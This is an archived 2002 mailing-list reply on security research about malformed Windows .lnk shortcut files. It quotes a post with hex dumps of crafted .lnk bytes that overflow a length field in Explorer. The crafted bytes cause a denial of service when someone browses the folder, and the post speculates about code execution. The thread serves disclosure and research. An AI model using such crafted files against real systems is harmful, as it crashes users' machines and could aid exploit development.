Re: Windows .lnk Files

From: cyberiadat_private
Date: Wed Jun 26 2002 - 11:43:18 PDT

  • Next message: Jose Nazario: "Re: OpenSSH Vulns (new?) Priv seperation"

    Hello,
    
    I've done some playing around with malformed .lnk files
    under Windows 2000 and found similar results; nothing
    published yet. I found it was similar to a problem USSR
    Labs reported some time ago with Windows NT but was in
    relation to SERVU FTP ... upload the malformed .lnk file
    execute a list and crash/overflow.
    
    Also discussed at,
    
    http://archives.neohapsis.com/archives/vuln-dev/2000-q1/0568.html
    
    Cyberiad
    
    On Wed, 26 Jun 2002, Brett Moore wrote:
    
    > It seems that the handling of .lnk files has a few problems. I have tested
    > on both win98 and win2000 sp2 server.
    >
    > Can anyone test further. Note that the actions taken by these .lnk files has
    > the possiblity of causing damage to a system and should not be tested on an
    > essential server :-)
    >
    > -------------------------------------------------------------------
    > 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
    > 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
    > 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 FF FF  t NEWTEX~3.TXT
    > FF FF 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    > 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    > 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00
    > -------------------------------------------------------------------
    >
    > This causes FF FF to be loaded into a register used to control the length of
    > data copied. Usually causes an error when right clicking on the file in
    > explorer. Sometimes it is required
    > to select properties. Errors seen include unable to read, unable to write.
    > Since we are controlling the length of the data copies these errors are self
    > explanatory.
    >
    > Would seeme that explorer/shell32.dll is copying to much data when reading
    > the filename?. Ok so
    > this causes the read/write errors and halts progress.
    >
    > But if we substitute valid values such as 01 01 (CC CC)  then the buffer
    > still gets overflowed but we bypass this error and our corrupt values get
    > further down in the program.
    >
    > -------------------------------------------------------------------
    > 32 00 1A 00-00 00 D8 2C-52 47 20 00-4E 65 77 20  2    +,RG  New
    > 54 65 78 74-20 44 6F 63-75 6D 65 6E-74 2E 74 78  Text Document.tx
    > 74 00 4E 45-57 54 45 58-7E 33 2E 54-58 54 CC CC  t NEWTEX~3.TXT¦¦
    > CC CC 0F 0F-0F 0F 0F 0F-FF F0 F0 F0-F0 F0 F0 F0  ¦¦¤¤¤¤¤¤________
    > AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
    > AA AA AA AA-AA AA AA AA-AA AA AA AA-AA AA AA AA  ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬
    > -------------------------------------------------------------------
    >
    > This one does not cause the read/write errors but causes a DoS in explorer
    > just by browsing to the folder holding the file.
    >
    > This is more interesting, but involves tracking a lot of assembler code.
    > Worst result would be some sort of code executed just by browsing a folder.
    > Virus related perhaps.
    >
    > Any feedback on results or further research into this problem would be
    > appreciated.
    >
    > Notes:
    > 	Do not save to your desktop.
    > 	Rename the file to .lnk
    > 	This is the win98 file. You can easily modify a 2000 or other lnk file as
    > detailed above.
    >
    >
    > Brett Moore
    >
    >
    



    This archive was generated by hypermail 2b30 : Wed Jun 26 2002 - 21:16:50 PDT